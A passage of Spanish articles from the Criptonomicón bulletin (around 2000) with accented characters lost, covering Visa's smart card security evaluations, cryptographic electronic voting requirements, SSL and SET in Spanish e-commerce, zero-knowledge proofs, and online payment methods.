supuesto, se requiere un cierto nivel de conocimientos de ingeniera para
hacerlo, y tambin cierta capacidad y experiencia en el manejo del equipo y
las tcnicas requeridas. Afortunadamente, estas capacidades y
conocimientos requieren un cierto grado de especializacin. Tal vez no todos
los ingenieros de telecomunicaciones sern capaces de hacerlo, pero
muchos pueden.
Las herramientas necesarias son a menudo muy caras, pero a veces pueden
encontrarse de segunda mano o alquilarse a un coste muchsimo ms
reducido que su precio de compra. Muchas escuelas tcnicas y
universidades ponen estos equipos a disposicin de los estudiantes y
personal con relativamente escasa supervisin. "Hackers" y acadmicos
tienen acceso a ellos, y los criminales potenciales pueden matricularse en
escuelas como el resto del mundo.
Los ataques al "software" requieren otro tipo de conocimientos: clculo,
diseo de protocolos y seguridad informtica. Tambin requieren una
capacidad especial, pero hay muchsima ms gente que la tiene.
Las tarjetas inteligentes dependen generalmente de la criptografa para al
menos parte de su seguridad. Los conocimientos de criptografa y la
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (6 of 9) [25/10/2000 02:31:03 p.m.]

Seguridad en Tarjetas con Microprocesador

capacidad para la misma son diferentes de los requeridos para el "hardware"


y el "software". La criptografa requiere un talento especial.
Para llevar a cabo el tipo de evaluaciones de seguridad que necesitamos, a
veces necesitamos enviar tarjetas a diferentes laboratorios para distintos
tipos de pruebas. Slo cuando las hemos probado contra todas las
posibilidades de ataque que conocemos sabemos si contamos con el nivel
de seguridad que necesitamos.
Adems de esto, preguntamos cuantos componentes (tarjetas) se necesitan
para generar un ataque que pueda comprometer a un volumen de tarjetas
significativo. Algunos tipos de ataque requieren destruir la tarjeta, pero en su
desarrollo se pueden adquirir valiosos conocimientos que permitan que el
siguiente ataque sea mucho ms sencillo y menos destructivo. En
consecuencia, un ataque que requiere muchas tarjetas resulta menos
amenazador que uno que pueda realizarse con una sola tarjeta.
Tambin necesitamos conocer cuanto tiempo se requiere para comprometer
una tarjeta. Se han hecho estimaciones del tiempo requerido para buscar
todas las claves posibles de un esquema criptogrfico, utilizando
ordenadores de gran potencia; esto es lo que se conoce como un ataque de
"fuerza bruta". Cualquier anlisis que dijera que seran necesarios 100
ordenadores potentes haciendo clculos durante un ao sera muy
tranquilizador. Un ataque que tuviera una probabilidad razonable de xito
utilizando un PC Pentium durante una semana sera mucho ms
preocupante.
Por ltimo, necesitamos conocer el valor de lo comprometido. Los
requerimientos de seguridad para una tarjeta desechable de bajo valor son
inferiores a los de una tarjeta monedero recargable. Una tarjeta diseada
para proteger unos saldos de cientos de miles de Ptas. tendr mayores
exigencias, pero an as menores que otra tarjeta diseada para proteger
varios millones de Ptas. Es importante recordar que el objetivo es que el
coste y el esfuerzo requeridos para un ataque con xito sean
significativamente superiores al beneficio del mismo. Y esto no podemos
evaluarlo hasta que no sepamos cual puede ser el beneficio.
Una vez conocidos los niveles de capacidad y experiencia, conocimientos,
capital o inversin, tiempo y nmero de componentes requeridos para llegar
a comprometer una tarjeta que protege ciertos valores, podemos decidir si la
seguridad es o no la apropiada.
De cualquier modo, las herramientas analticas mejoran continuamente, los
ordenadores son ms y ms potentes, los criminales y los "hackers"
aprenden igual que lo hacemos nosotros. Por eso, los resultados de las
evaluaciones no pueden ser "para siempre". Esto es sensiblemente diferente
de una evaluacin funcional, en la cual la tarjeta o ha implantado o no ha
implantado adecuadamente una especificacin. Las evaluaciones de

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (7 of 9) [25/10/2000 02:31:03 p.m.]

Seguridad en Tarjetas con Microprocesador

seguridad son vlidas por un perodo de tiempo limitado, generalmente de 1


a 3 aos. Despus de este perodo necesitamos re-examinar las tarjetas a la
luz de los cambios acontecidos en el mismo. Si no se han producido
cambios significativos, la validez de la evaluacin puede extenderse. Pero si
han aparecido ataques nuevos o ms efectivos, deber ser repetida.
Las Directrices de Visa
Visa produjo en 1997 una Gua o serie de directrices para los diseadores
de microprocesadores y tarjetas inteligentes. Son recomendaciones que se
refieren a las caractersticas de seguridad que generalmente nos gustara
encontrarnos en las evaluaciones que efectuamos. No son requerimientos y,
ciertamente, no son requerimientos aplicables a cualquier tarjeta inteligente
Visa ya que estos varan dependiendo de la aplicacin.
La Gua contiene 35 directrices de especificaciones de diseo, 45 directrices
de diseo del circuito integrado, 60 directrices para el software, 46 directrices
para la implantacin y 21 "tests" o pruebas especficas para ser llevadas a
cabo. Muchas de ellas dicen lo que debera hacerse, pero no
necesariamente como hacerlo. Nuestra intencin era y es animar a los
diseadores a reconocer y solucionar estos problemas de seguridad, pero no
queremos imponer ninguna solucin determinada para los mismos. Estamos
convencidos de que la industria sale ms beneficiada animando a los
diseadores y programadores a ejercitar su creatividad para que aparezcan
diferentes aproximaciones a las soluciones de los problemas.
La Gua de directrices ha estado disponible en todo momento para
cualquiera que tuviera un inters legtimo en ella.
Conclusiones
En nuestro sistema, un "aprobado" significa que el ratio coste / beneficio
para comprometer el valor protegido por la tarjeta es alto. No hay ninguna
tarjeta inteligente absolutamente segura. Todo "aprobado" tiene fecha de
caducidad.
El tipo de pruebas que realizamos requiere un alto nivel de conocimientos y
experiencia. Hay pocos lugares en el mundo donde pueden realizarlas.
Hemos contratado con varios laboratorios y estamos buscando otros nuevos.
Las pruebas son caras y requieren tiempo.
A medio plazo, queremos que sean los suministradores quienes se evalen
a s mismos contra un estndar en el que todos nos podamos reconocer,
aunque el trabajo siga siendo realizado por laboratorios independientes.
Nosotros nos limitaramos a revisar los resultados o hacer alguna
confirmacin o prueba adicional con nuevos ataques, ya que continuaramos
nuestra labor de I+D. No podemos abdicar de nuestra responsabilidad ante
nuestros ms de 21.000 Entidades Miembros.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (8 of 9) [25/10/2000 02:31:03 p.m.]

Seguridad en Tarjetas con Microprocesador

Nuestra recomendacin es que todo usuario de tarjetas inteligentes piense


cuidadosamente qu es un nivel de riesgo admisible para l, desarrollar
unos conocimientos en como las tarjetas pueden ser atacadas y tener
revisiones de seguridad independientes que confirmen que posee un nivel
de seguridad adecuado para sus aplicaciones.
Publicado en el Boletn del Criptonomicn #47 y #49.
Francisco Ginel es director de Gestin de Riesgos y Seguridad de Visa Internacional.

Informacin adicional

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos47.html (9 of 9) [25/10/2000 02:31:03 p.m.]

Votaciones a travs de Internet

Comercio electrnico

Criptologa y seguridad

Cuestiones legales

Intimidad y privacidad

Virus

Esquemas Criptogrficos para Realizar Procesos


Electorales en una Red de Ordenadores
Por Andreu Riera Jorba

El objetivo ltimo de una red de ordenadores es mover informacin de un


punto a otro. Moviendo informacin, se evitan los desplazamientos
personales. El banco en casa, el teletrabajo o la venta de entradas a
distancia son ejemplos de aplicaciones que usan redes de ordenadores con
ese objetivo. Otro ejemplo de aplicacin sera un esquema de votacin
electrnica. El objetivo de un esquema de votacin electrnica es permitir la
toma de decisiones (y en particular, los procesos electorales) sobre una red
de ordenadores abierta y de propsito general. Las ventajas que supondra
la utilizacin (suplementaria) de redes de ordenadores para realizar
votaciones o encuestas electorales incluyen el ahorro de tiempo y de dinero,
as como el potencial incremento de participacin de los votantes.
El diseo de una aplicacin informtica distribuida que implemente un
servicio de votacin en red debe considerar todo un conjunto de medidas
con el fin de garantizar una lista preestablecida de requisitos de seguridad.
Actualmente, en la comunidad cientfica internacional existe un buen
consenso sobre cuales deberan ser dichos requisitos de seguridad:
1. Exactitud: Un esquema de votacin es exacto si no resulta posible alterar
o eliminar un voto que ha sido validado, y tampoco resulta posible incluir en
el recuento un voto no validado.
2. Democracia: Un esquema de votacin es democrtico si permite votar
slo a los votantes censados, y una sola vez.
3. Privacidad: En el requisito de privacidad intervienen tres factores. En
primer lugar el esquema debe ser annimo, de modo que no resulte posible
averiguar el voto de ningn votante. En segundo lugar, el esquema ha de
evitar que ningn votante pueda demostrar cual fue su voto, con el objeto de
eliminar la posibilidad de extorsin o de compra de votos. Finalmente, el
esquema debe garantizar la no existencia de recuentos parciales antes de la
finalizacin de la votacin.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos46.html (1 of 3) [25/10/2000 02:31:03 p.m.]

Votaciones a travs de Internet

4. Verificabilidad: Un esquema de votacin es verificable si los votantes


pueden comprobar que sus correspondientes votos han sido realmente
incluidos en el recuento final. Una variante ms rigurosa de este requisito es
la verificabilidad universal, en el sentido de que cada votante (y, en general,
cualquier persona) pueda verificar la integridad de todo el conjunto de votos.
Para dotar a una aplicacin de votacin en red de estas caractersticas de
seguridad, deben incluirse en su diseo toda una serie de protocolos y
mecanismos criptogrficos, formando en su conjunto un esquema
criptogrfico de votacin electrnica. El campo de los esquemas
criptogrficos para aplicaciones de votacin ha atrado gran atencin de los
investigadores durante la ltima dcada. Debido a la multitud de requisitos
de seguridad implicados (que a menudo resultan contradictorios) las
soluciones no resultan triviales. En general, con frecuencia ser necesario
sacrificar determinadas caractersticas deseables con el fin de lograr un bien
considerado mayor.
El creciente uso de Internet en Espaa va a proporcionar el entorno ideal
para el desarrollo de aplicaciones en red seguras como esquemas de
votacin electrnica o comercio electrnico. De hecho, la tecnologa
criptogrfica permite dotar, con suficientes garantas, a tales aplicaciones de
los necesarios servicios de seguridad. No obstante, en la prctica, el mayor
reto con que se enfrentarn las votaciones electrnicas es el de la
aceptacin social. De la misma manera que la difusin del uso de tarjetas de
crdito supuso un proceso paulatino que an hoy est en expansin, las
futuras aplicaciones seguras sobre redes como Internet van a necesitar un
cierto tiempo para lograr modificar los hbitos culturales de la sociedad. Una
pieza clave para este proceso ser el establecimiento de centros de
confianza en la red que integren la denominada infraestructura de clave
pblica. Dichos nodos pueden acelerar la definitiva transformacin hacia la
sociedad de la informacin si detrs de ellos existe una organizacin que, en
parmetros convencionales, sea ya actualmente de confianza para la
sociedad (la Administracin, entidades bancarias, operadores de
comunicaciones, etctera).
En la Unidad de Combinatoria y Comunicacin Digital de la Universidad
Autnoma de Barcelona desarrollamos un prototipo para realizar votaciones
seguras a travs de una red de rea local, resultado de un proyecto
financiado por la CICYT. Actualmente, con la misma financiacin, nos
encontramos trabajando en un nuevo proyecto con el objetivo de obtener un
sistema de votacin segura que utilice el soporte de la World Wide Web. A
travs de protocolos de coordinacin de diversos Colegios Electorales
Electrnicos, resultar posible llevar a cabo votaciones a gran escala con un
nmero ilimitado de votantes censados.
Publicado en el Boletn del Criptonomicn #46.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos46.html (2 of 3) [25/10/2000 02:31:03 p.m.]

Votaciones a travs de Internet

Andreu Riera Jorba pertenece al Dept. Informtica, Universidad Autnoma de Barcelona.

Informacin adicional

Welcome to UK Citizens Online Democracy

Democrcia.web

Electronic Democracy Resources

Electronic Voting Hot List

Democracies Online

eDemocracy International

"Electronic Democracy" by Scott London

Participaci

edemocracy - The Electronic Democracy Resource site

El voto electrnico en Euskadi

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos46.html (3 of 3) [25/10/2000 02:31:03 p.m.]

Los secretos del comercio electrnico en Espaa

Comercio electrnico

Criptologa y seguridad

Los secretos del comercio electrnico en Espaa

Cuestiones legales

Por Oscar Conesa

Intimidad y privacidad

Introduccin

Virus

Entendemos el Comercio Electrnico como cualquier tipo de intercambio


financiero realizado a distancia y por medios electrnicos, siendo Internet el
medio ideal para realizar este tipo de negocios. EL principal beneficio que
puede obtenerse en este tipo de negocios es la relacin directa entre
fabricante y cliente sin necesidad de intermediarios lo que en teora debera
rebajar el precio del producto. Hoy en da se puede realizar este tipo de
actividades a travs de Internet pero aun no se ha producido el verdadero
"boom" que segn todas las consultoras importantes se producir en los
prximos aos. Tan solo algunas empresas pioneras, como el conocido caso
de la librera Amazon, han sabido aprovechar la oportunidad. Aunque
tambin es verdad que muchas grandes empresas estn preparndose a la
espera de ese gran "boom" anunciado del Comercio Electrnico.
Principales problemas del comercio electrnico hoy
Hoy en da el principal problema es que la gente no se ha lanzado a comprar
por Internet por una falta de costumbre y seguridad. Las empresas deben
crear un marco global que permita las transacciones seguras por Internet, e
inevitablemente esto debe venir acompaado de una rebaja sustancial en los
precios que haga atractivo a los nuevos consumidores utilizar este medio.
Seguridad en las Transacciones Electrnicas
Desde el punto de vista de la Seguridad Informtica, el principal problema
radica en garantizar la seguridad de las transacciones electrnicas
realizadas a distancia. Esto debe garantizarse mediante el uso de la
moderna criptografa de clave publica.
El mtodo de pago por excelencia en Internet es y ser las tarjetas de
crdito. Para ello ahora se esta utilizando el protocolo SSL que garantiza la
creacin de un canal seguro entre Cliente y Vendedor. Por este canal el
Cliente enva su Numero de Tarjeta de Crdito. EL Vendedor hace pasar

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos43.html (1 of 4) [25/10/2000 02:31:04 p.m.]

Los secretos del comercio electrnico en Espaa

este numero por un Interface a un TPV (Terminal Punto de Venta) como los
que se utilizan en todas las tiendas para cobrar con tarjeta y as se realiza la
transferencia. Aunque se garantiza la confidencialidad de las transmisiones,
aun hay varios puntos muy importantes que SSL no garantiza:
No hay recibos, una reclamacin por parte del cliente quedara a la
buena voluntad del Vendedor.
No hay autentificaron de tarjetas, cualquier persona que tenga acceso
a un numero de una tarjeta de crdito podra realizar una transaccin.
El cliente puede realizar fraudes fcilmente.
El Vendedor obtiene toda la informacin del cliente (numero de tarjeta
de crdito) y podra utilizarla fraudulentamente.
Tienen solucin? Qu se est haciendo para solucionarlos?
En un sistema de comercio electrnico se deberan garantizar las siguientes
caractersticas:
1. Confidencialidad: Ninguna persona ajena a la transaccin debe tener
acceso a los datos financieros. Mas aun, seria importante que el vendedor
tampoco tuviese acceso a esos datos y que el banco no tuviese acceso a los
datos de la venta.
2. Integridad: El sistema debe garantizar que la integridad de los datos
enviados, de no ser as el Vendedor podra aumentar el importe de la
compra posteriormente, por ejemplo.
3. Autenticacin: Todos los participantes deben estar perfectamente
identificados para evitar el principal tipo de fraude: la utilizacin de tarjetas
de crdito robadas.
4. No repudio: El sistema debe generar Recibos que impidan que alguno de
los participantes en la transaccin niegue haber participado en ella.
SSL no garantiza la mayora de estas propiedades. Por este motivo VISA y
MASTERCARD decidieron dar un impulso a la utilizacin de Tarjetas de
Crdito en la compra por Internet creando un nuevo protocolo que tuviese en
cuenta todos estos condicionantes. El protocolo resultante se llama SET
(Secure Electronic Transactions). Este proyecto cuenta con el apoyo de
empresas como: IBM, GTE, Microsoft, Netscape, RSA, Verisign y Verifone
(HP).
SET - Secure Electronic Transactions
En este protocolo se establecen tres entidades independientes: El Cliente, el
Vendedor y la Pasarela de Pago. Todas las comunicaciones entre ambos se
realizan por Internet y se cifran. Antes de realizar cualquier transaccin,
todas las partes deben obtener un Certificado Electrnico que garantice su
Identidad.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos43.html (2 of 4) [25/10/2000 02:31:04 p.m.]

Los secretos del comercio electrnico en Espaa

El protocolo comienza cuando el Cliente abre su software de Billetera


Electrnica y decide hacer una compra. El Vendedor enva un mensaje que
especifica la descripcin del producto y el importe del mismo, as como un
certificado con su clave publica. El Cliente cifra su numero de tarjeta de
crdito y estos datos y los enva al Vendedor. El Vendedor, una vez recibido
este mensaje lo descifra y lo vuelve a cifrar con la clave pblica de la
Pasarela de Pago. La pasarela recibe el mensaje y lo enva al Banco
correspondiente utilizando las redes bancarias. Se realiza la transaccin y la
Pasarela enva la respuesta al Vendedor y este la manda al Cliente
finalizando as la compra. Todos los mensajes se firman digitalmente de tal
manera que existan comprobantes de compra.
Los datos bancarios se firman con un sistema denominado firma dual, que
posibilita que el banco no tenga acceso a los datos de la compra y que el
Vendedor no pueda acceder a los datos financieros de la tarjeta de crdito.
Los algoritmos criptogrficos utilizados son RSA y DES.
El comercio electrnico ser una realidad o es una quimera futurista?
SET ha sido aceptado por todos los implicados, incluidos los bancos que han
apostado fuertemente por este sistema. Para que SET funcione es necesario
que se den los siguientes pasos:
Incorporar software de Billetera Electrnica SET en los navegadores.
Creacin de Software de Vendedor, Pasarela de Pago y Autoridad
Certificadora compatibles con SET.
Crear los certificados SET tanto para Clientes como para Vendedores
y Bancos.
Situacin de Espaa en el panorama del comercio electrnico
En Espaa se ha apostado muy fuerte por el protocolo SET, tanto es as que
se ha creado una Autoridad Certificadora especialmente para este propsito
llamada ACE (Agencia de Certificacin Electrnica). ACE fue creada por
Telefnica (40%), sistema 4B (20%), Visa Espaa (20%) y la Confederacin
Espaola de Cajas de Ahorro (CECA-20%). Lo que significa que toda la
banca espaola esta incluida en este proyecto. ACE ha comenzado a emitir
certificados SET pero de modo experimental. De momento se ha creado una
pasarela de pago en Sistemas 4B.
Futuro de SET
Aunque se ha apostado muy fuerte por SET, este sistema no acaba de
arrancar por diferentes motivos. Segn mi opinin este sistema no llegara a
funcionar en su versin actual sino que se esperara a la versin SET 2.0.
El defecto de SET 1.0 es el modo de almacenar los certificados electrnicos,
que convierten a estos archivos en un punto muy vulnerable del sistema de
seguridad, sobre todo teniendo en cuenta que sern utilizados por el publico
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos43.html (3 of 4) [25/10/2000 02:31:04 p.m.]

Los secretos del comercio electrnico en Espaa

en general.
SET 2.0 es la nueva versin de SET que integrara el uso de Tarjetas
Inteligentes. El principal problema es la necesidad de incorporar un lector de
tarjetas en cada PC. Si se superase este problema tendramos un sistema
realmente robusto de pagos electrnicos.
Publicado en el Boletn del Criptonomicn #43.
Oscar Conesa ha realizando su Proyecto de Fin Carrera en Ingeniera Superior de
Telecomunicaciones, titulado "Seguridad en el Comercio Electrnico por Internet", en el
Dept. de Matematica Aplicada y Telematica de la UPC. Como actividad complementaria a
este proyecto cre una lista de correo sobre el Comercio Electrnico que al poco tiempo
se convirti en la ms importante del mundo hispano sobre este tema gracias a la
participacin activa de muchos expertos espaoles y extranjeros que se dieron de alta en
ella.

Informacin adicional

Seguridad en el comercio electrnico: SSL o SET?

Seguridad en SSL, artculo publicado en iWorld.

SET a fondo, artculo publicado en iWorld.

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos43.html (4 of 4) [25/10/2000 02:31:04 p.m.]

Conocimiento Nulo

Comercio electrnico

Criptologa y seguridad

Conocimiento Nulo

Cuestiones legales

Por M Candelaria Hernndez

Intimidad y privacidad

En muchas situaciones de la vida diaria, y cada vez con mayor asiduidad, es

Virus

necesario demostrar la identidad de un individuo mediante un nmero de


identificacin o un cdigo de acceso. Esta informacin secreta se almacena
mediante algn dispositivo para luego ser validada, y es justo en ese
momento cuando es ms vulnerable a ciertos ataques. El uso de las
demostraciones de Conocimiento Nulo en los esquemas de identificacin
puede proteger el secreto de dicha informacin.
Se llama Demostraciones de Conocimiento Nulo a todos aquellos protocolos
criptogrficos en los que un Probador (Patricia) puede convencer a un
Verificador (Vicente) de la posesin de cierta informacin comprometida sin
mostrarle nada de dicha informacin. Un ejemplo sencillo que ilustra esta
idea es el siguiente:
Se parte de la existencia de una cueva muy particular. Esta cueva posee una
nica entrada y en su interior se bifurca en dos tneles, los dos sin salida.
Sin embargo, la cueva tiene un secreto: diciendo unas palabras mgicas se
abre una puerta que comunica ambos tneles.
Si Patricia conoce las palabras mgicas, y desea convencer a Vicente de
ello sin tener que revelarle las palabras, lo nico que debe hacer es repetir el
siguiente protocolo un nmero suficiente de veces:
P1: Vicente se queda en la entrada de la cueva.
P2: Patricia entra y camina por uno de los pasadizos.
P3: Cuando desde la entrada no se ve a Patricia, Vicente entra y se sita en
el punto de bifurcacin.
P4: Vicente le indica a Patricia a) que aparezca por el pasadizo izquierdo b)
o bien que aparezca por el pasadizo derecho.
P5: Patricia abre la puerta con las palabras mgicas y aparece por el tnel

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos41.html (1 of 3) [25/10/2000 02:31:04 p.m.]

Conocimiento Nulo

que Vicente le indic.


A este tipo de protocolos se le exigen las propiedades especificadas a
continuacin:
1. Patricia debe tener una probabilidad prcticamente nula de engaar a
Vicente. Esto es, si Patricia no conoce las palabras mgicas tendr que
entrar y salir por el mismo pasadizo. Esta estafa no ser detectada si el tnel
que solicit Vicente coincide con el que ella eligi. Por tanto, tiene un 50%
de posibilidades de engaar a Vicente en una iteracin y la posibilidad de
que Patricia lo engae en dos iteraciones disminuye en un 25%. Por tanto,
para que el protocolo sea seguro en este sentido basta conque se ejecute un
nmero de iteraciones lo suficientemente grande.
2. Vicente no obtendr informacin de la ejecucin del protocolo que pueda
darle idea de cules son las palabras mgicas.
3. Vicente no averiguar nada del secreto con la participacin de Patricia
que no pudiera averiguar por s solo.
A continuacin se presenta el esquema general de las Demostraciones de
Conocimiento Nulo:
P1: El Probador selecciona un elemento aleatorio de un conjunto
predefinido, y a partir de l define un conjunto de preguntas cuyas
respuestas slo l conoce.
P2: El Verificador escoge una de las preguntas.
P3: El Probador proporciona la respuesta correspondiente.
P4: El Verificador comprueba la respuesta.
Los ingredientes bsicos de este tipo de protocolo son tres:
a) interaccin, puesto que se origina un flujo de peticiones y respuestas
entre Probador y Verificador (transacciones),
b) aleatorizacin, ya que el verificador realiza su peticin de manera
aleatoria, consiguiendo as que la probabilidad de estafa del probador
disminuya en cada iteracin
c) complejidad computacional del problema que se toma como base.
Habra que plantearse si Al Bab, de conocer este mtodo, habra publicado
un trabajo demostrando que conoca las palabras mgicas "brete Ssamo".
De ser as probablemente hoy en da no las conoceramos.
Publicado en el Boletn del Criptonomicn #41.
M Candelaria Hernndez Goya es Profesora asociada del Departamento de Estadstica,
Investigacin Operativa y Computacin de la Universidad de La Laguna en Canarias.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos41.html (2 of 3) [25/10/2000 02:31:04 p.m.]

Conocimiento Nulo

Informacin adicional
http://www.tcm.hut.fi/Opinnot/Tik-110.501/1995/zeroknowledge.html
Artculos publicados

Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.


Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos41.html (3 of 3) [25/10/2000 02:31:04 p.m.]

Claves para la venta de productos o servicios a travs de Internet

Comercio electrnico

Criptologa y seguridad

Cuestiones legales

Intimidad y privacidad

Virus

Claves para la venta de productos o servicios a travs


de Internet
Por Fernando Ramos Surez
Para realizar la venta de un producto o servicio por Internet nos encontramos
con una gran cantidad de problemas que debemos salvar. Dichos problemas
se resumen bsicamente en los siguientes puntos:
1) Existe una gran dificultad en darse a conocer. No con la simple alta de la
Web en los miles de buscadores que existen o con el intercambio de
banners es suficiente, es necesaria una buena campaa de publicidad y por
tanto es necesario hacer un gran esfuerzo econmico en ste aspecto.
2) A parte de la publicidad est la forma de pago. Segn los estudios
realizados el comprador de Internet es compulsivo de ah que sea necesario
facilitarle un medio de pago instantneo, como puede ser la tradicional
tarjeta de crdito o dbito con la consiguiente comisin del banco. En la
actualidad se estn implementando nuevos medios de pago, entre los cuales
podemos destacar las tarjetas inteligentes (smart cards) que son aquellas
tarjetas que incorporan un circuito integrado y cuyo contenido, una vez ledo
por el lector correspondiente, permite que el usuario tenga acceso a una
serie de prestaciones. Tambin estn las tarjetas monedero (recargables o
de un nico uso), es decir, tarjetas prepago emitidas por entidades de
crdito, que contienen un microchip y que bsicamente permiten el
almacenamiento de una determinada cantidad de dinero a voluntad del titular
de la tarjeta. Por ultimo tendramos el medio de pago ms innovador el
dinero electrnico (e-cash, e-money) enviado por las entidades financieras
al usuario para que este lo almacene en su ordenador pudiendo disponer del
mismo en el momento de la compra. La finalidad de todos estos sistemas es
la de permitir pagos en Internet sin necesidad de que el usuario tenga que
introducir continuamente sus datos bancarios en la misma agilizando as el
trfico comercial.
3) La Interoperabilidad en los pagos a travs de entidades financieras. Para
la realizacin de un pago en Internet es necesario que el servidor que da
alojamiento a la Web pueda implementar el famoso CGI. Cada banco tiene

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos38.html (1 of 5) [25/10/2000 02:31:05 p.m.]

Claves para la venta de productos o servicios a travs de Internet

unos CGI diferentes y por tanto es necesario que tu servidor Web pueda o
tenga implementado dicho CGI, puesto que si no lo tiene o no le es rentable
implementarlo te obliga a cambiar de servidor o de entidad financiera.
4) Por otro lado existe la desconfianza de los consumidores en el medio de
pago. Todos estos nuevos medios de pago pueden producir desconfianza en
el pblico, pero estamos hablando de la misma desconfianza que se produjo
cuando se implantaron las tarjetas de crdito y dbito. Actualmente las
tarjetas estn fuertemente arraigadas proporcionando muchos servicios
tanto dentro como fuera de Espaa. Incluso se sabe que tienen limitada su
responsabilidad en caso de prdida o robo, no olvidando que existe una gran
facilidad y rapidez en la anulacin cuando se producen estos hechos. Por
tanto, creo que es un problema de mentalizacin o concienciacin social,
cuya solucin pasa por elaboracin de una estructura financiera capaz de
aportar una gran seguridad en las transacciones electrnicas.
Siendo por tanto la seguridad la clave para la solucin del comercio
electrnico, me gustara diferenciar previamente los tipos de seguridad que
se estn dando hasta el momento. Los sistemas de seguridad que se
implementan actualmente se pueden dividir en dos grupos :
1. Canales seguros de comunicacin. Son aquellos que agrupan un conjunto
de protocolos que garantizan la confidencialidad y la integridad de las
comunicaciones va red. De entre los cuales destacan:
SHTTP (Secure HiperText Transfer Protocol), que da soluciones de
seguridad a las conexiones HTTP.
El Protocolo SSL (Secure Socket Layer), diseado e implementado por
Netscape, que proporciona sesiones de comunicacin cifradas y
autenticacin del servidor.
El Protocolo de Microsoft, (PCT) muy parecido al de su competidor
pero compatible con varios protocolos.
2. Sistemas de claves. Se trata de una de las aplicaciones ms importantes
ya que el usuario puede ejecutar una clave desde cualquier lugar de la red
para as obtener la seguridad en la transaccin. Aqu nos encontraramos
con los sistemas criptogrficos simtricos y asimtricos.
a) Encriptacin simtrica: obliga a los dos interlocutores (emisor y receptor)
del mensaje a utilizar la misma clave para cifrar y descifrar el mismo (como
por ejemplo el criptosistema "DES" desarrollado por IBM, Data Encryption
Standard).
b) Encriptacin asimtrica o criptografa de claves pblicas la cual est
basada en el concepto de pares de claves, de forma tal que cada una de las
claves puede encriptar informacin que slo la otra clave pueda desencriptar
el mensaje. El par de claves se asocia a una sola persona, de forma que la
clave privada solamente es conocida por su propietario (no siendo necesaria
la retencin mental, ya que puede ser incorporada en el microchip de la
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos38.html (2 of 5) [25/10/2000 02:31:05 p.m.]

Claves para la venta de productos o servicios a travs de Internet

tarjeta o puede ser proporcionada por un rasgo fisiolgico como la huella


dactilar o el iris del ojo) mientras que la otra clave, (la pblica) se publica
ampliamente para que todos la conozcan (en este caso destaca el famoso
criptosistema RSA cuyas iniciales son las de sus creadores Rivest, Shamir y
Adelman). En este sentido convendra sealar que U.S.A no ha permitido
hasta hace poco la exportacin de productos criptogrficos que hicieran uso
de claves de ms de 40 bits, ahora s permiten la exportacin de dichos
productos pero siempre que estos incluyan un sistema de recuperacin de
claves o de depsito de claves (key scrow). Esta poltica realizada por la
Administracin Clinton parece que no ha cado bien entre los fabricantes de
software y activistas norteamericanos. No slo en U.S.A. ha sido mal
acogida, a Alemania por ejemplo, no le ha sentado nada bien que un
gobierno o agencia extranjera pueda tener acceso a las claves de los
usuarios alemanes, parece por tanto, que esta poltica puede entrar en
conflicto con las leyes de otros Estados, ya que la mayora de los Estados
